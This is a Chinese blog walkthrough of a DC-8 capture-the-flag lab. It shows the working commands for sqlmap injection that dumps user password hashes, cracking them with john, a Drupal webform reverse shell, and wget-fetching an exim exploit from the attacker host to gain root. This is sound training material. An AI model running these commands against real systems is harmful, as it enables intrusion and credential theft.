DC-8靶机渗透测试

已于 2023-06-03 12:01:43 修改
阅读量466 收藏 1
点赞数
分类专栏: DC靶机系列 文章标签: web安全 linux 服务器
于 2023-05-12 23:11:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64297700/article/details/130648236
版权

DC-8

靶机所需环境

  • 目标靶机:DC-8(192.168.160.182)
  • 攻击机:Kali Linux(192.168.160.176)

信息收集

  • 通过扫描成功发现存活的主机;
arp-scan -l

在这里插入图片描述

  • 使用nmap对目标主机进行端口服务扫描,发现开放了80和22端口;
nmap -sV -O 192.168.160.182

在这里插入图片描述

  • 尝试访问80端口,看到页面有没有很熟悉呢?对,自信点就是DC-7😂;

在这里插入图片描述

  • 对页面进行测试发现Contact Us处貌似存在sql注入;

在这里插入图片描述

  • 加单引号进行测试发现页面报错,验证为报错注入;

在这里插入图片描述

报错注入利用

查询数据库

sqlmap -u "http://192.168.160.182/?nid=1*" --dbs --batch

在这里插入图片描述

查询表

sqlmap -u "http://192.168.160.182/?nid=1*" -D "d7db" --tables --batch

在这里插入图片描述

查询字段

sqlmap -u "http://192.168.160.182/?nid=1*" -D "d7db" -T "users" --columns --batch

在这里插入图片描述

查询值

sqlmap -u "http://192.168.160.182/?nid=1*" -D "d7db" -T "users" -C "name,pass" --du
mp --batch

在这里插入图片描述

爆破登录

  • 将获取到的用户和密码保存为pass文件,使用kali自带的john进行爆破,这里进行说明一下可能存在的问题,由于将hash值放在一起好像爆破不出来,也不知道啥子原因,后将hash值分开进行爆破,成功爆破出john密码为trutle

在这里插入图片描述

用户: john
密码: turtle
  • 看到这里可能有小伙伴要问为啥爆破出来的和我的不太一样啦,请往下看;

知识小拓展1

john 文件名 ——> 第一次使用john时正常打印结果;
john --show 文件名 ——> 第二次使用john命令时不会输出结果,可使用–show参数打印上一次的结果;

  • 由于还不知道登录页面在哪里,扫描目录发现有个robots.txt文件;
dirb http://192.168.160.182

在这里插入图片描述

  • 访问看到说不允许访问/user/login目录,咱调皮一点就要访问😜;

在这里插入图片描述

  • 成功登录后台;

在这里插入图片描述

反弹shell

  • 点击Contact Us,然后选择Webform ——> form settings,选择PHP code,然后输入反弹shell的命令;(注:记得写<p>标签,不然会反弹不成功,内容可随意)

在这里插入图片描述

  • kali开启监听,端口为反弹shell的端口,接着保存输入的内容;(注:一定要先开启监听再保存,不然可能会反弹失败)

在这里插入图片描述

  • 点击Contact Us回到页面,随便输入内容提交下;

在这里插入图片描述

  • 页面一直转圈说明成功了,返回kali查看,执行python命令进行交互shell;
python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

权限提升

  • 执行命令发现为www-data权限,查看下SUID权限的命令;
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

  • 发现exim4命令,查看版本发现为exim 4.89

在这里插入图片描述

  • 利用serachsploit查找exim命令的漏洞;

在这里插入图片描述

  • 下载到当前目录后,查看该exp的用法;

在这里插入图片描述
在这里插入图片描述

  • kali开启http服务将exp传输到靶机/tmp目录下;(注:为什么/tmp目录呢?因为在/tmp目录下具有写的权限)
python -m http.server 8000

在这里插入图片描述

wget http://192.168.160.176:8000/46996.sh

在这里插入图片描述

  • 赋予文件权限,并执行命令进行提权操作,发现两个命令都报错了😳;

在这里插入图片描述

  • 查阅资料发现发现这个报错是由于windows下编辑上传到linux下执行导致的;

知识小拓展2

其中类型分为dosunix格式,如果为dos,需要改为unix模式;
执行命令强制转为set ff=unix即可;

  • kali编辑文件Esc + ;然后输入set ff?查看类型,发现为dos类型;

在这里插入图片描述

  • Esc + ;输入set ff=unix

在这里插入图片描述

  • 重复前面操作,开启http服务重新传输一下文件,再赋予文件权限;

在这里插入图片描述

  • 执行第一个命令发现未提权成功;

在这里插入图片描述

  • 尝试第二个命令成功获取root权限;

在这里插入图片描述
在这里插入图片描述
上一篇 > DC-7靶机渗透测试

下一篇 > DC-9靶机渗透测试

以上内容就是DC-8靶机渗透测试的全过程,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!

以上内容仅供学习参考使用,切勿用于非法用途,切勿用于非法用途,切勿用于非法用途!!!重要的事情说三遍

橘猫的饼干798
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-8靶机渗透
whylon的博客
07-26 430
DC-8靶机渗透 文章目录DC-8靶机渗透信息收集漏洞利用获得shell提权 请勿用文章中的手段进行违法攻击,做守法公民,利用文中手段造成不良行为后果本文作者概不负责 信息收集 首先发现存活主机 发现目标主机ip为192.168.11.132,我们的kali ip为192.168.11.129,现在我们探测敏感目录 使用dirsearch工具首先没安装的要安装 apt-get install dirsearch #安装dirsearch dirsearch -u "http://192.168.11.13
DC-8靶机渗透过程
weixin_52766206的博客
08-11 234
对Vulnhub靶机DC-8进行渗透
靶机9 DC-8(过程超详细)
honest_gg的博客
09-26 2089
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC8靶场渗透流程(超详细)
m0_64583632的博客
04-12 589
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
VulnHub靶机 DC-8 打靶实战 详细渗透过程
最新发布
rumil的博客
04-24 1372
主机发现—端口扫描—服务探针—指纹识别—发现注入点—web渗透SQL注入—获取用户名密码—登入后台—发现可加载PHP代码输入PHP代码—反弹shell—提权—exim4漏洞利用。将其拷贝到本地,发现靶机有wget命令,那么可以通过wget进行下载,本地通过python开启一个http服务。访问web界面,通过上述信息收集加插件,得到以下信息,采用Drupal CMS,版本为Drupal 7。找到可代码执行的地方,或者可以输入代码的地方,尝试输入,保存即可。查看数据库当中的表信息,还有表中的内容。
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC靶机系列:DC-8
Ays.Ie的博客
02-28 258
本篇文章为DC系列第8个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
DC系列漏洞靶场-渗透测试学习复现(DC-8)
W983079520的博客
12-10 1851
DC-8是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了shell反弹和exim提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-8靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。
Neos的渗透测试靶机练习——DC-8
qq_38678845的博客
01-14 978
一次渗透测试练习
vulnhub DC-8靶机实战
m0_51195235的博客
12-01 515
vulnhub DC-8靶机实战
靶机 dc系列 dc-8
wl0326ghb的博客
12-29 181
dc-8
DC8靶机渗透测试(个人学习记录)
m0_53806046的博客
03-24 1055
SUID位允许用户以文件所有者的身份执行文件,而不是以用户自己的权限执行。当一个文件设置了SUID位(4000)时,这意味着当用户执行该文件时,他们将以该文件的所有者身份执行,而不是以他们自己的用户身份执行。2>/dev/null:这部分是将标准错误(stderr)重定向到 /dev/null,这意味着任何错误消息(例如,无法访问的目录或文件)都会被忽略,不会显示在命令输出中。它是最常用的密码测试和破解程序之一,因为它将多个密码破解程序合并到一个软件包中,可以自动检测密码哈希类型,并包含可定制的破解器。
DC: 8靶机-Walkthrough
ins1ght的博客
09-26 759
DC: 8靶机,不知道是不是这个系列的最后一个靶机,后面会把DC:1~6的Walkthrough都放出来,啥时候不确定,但一定有。靶机做了一些之后就发现“信息收集是王道,注意细节是魔鬼”,尤其这个靶机,真的是细节是魔鬼????。enjoy
vulnhub之DC8靶机
LainWith的博客
02-15 2925
目录介绍信息收集主机发现主机信息探测访问网站目录扫描漏洞发现手工SQL联合查询注入1. 判断列数,得知是1列2. 数据查询&信息收集(union select)3. 获取数据库的表名4. 查询指定表名下的列名信息5. 查询指定列获取数据6. 爆破密码反弹shell提权exim4提权拿到Flag 介绍 系列: DC(此系列共10台) 发布日期:2019年9月8日 难度:中级 Flag:此挑战的最终目标是绕过双因素身份验证,获取root权限并读取唯一的Flag 学习: sql注入 网站挂马 exim4
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值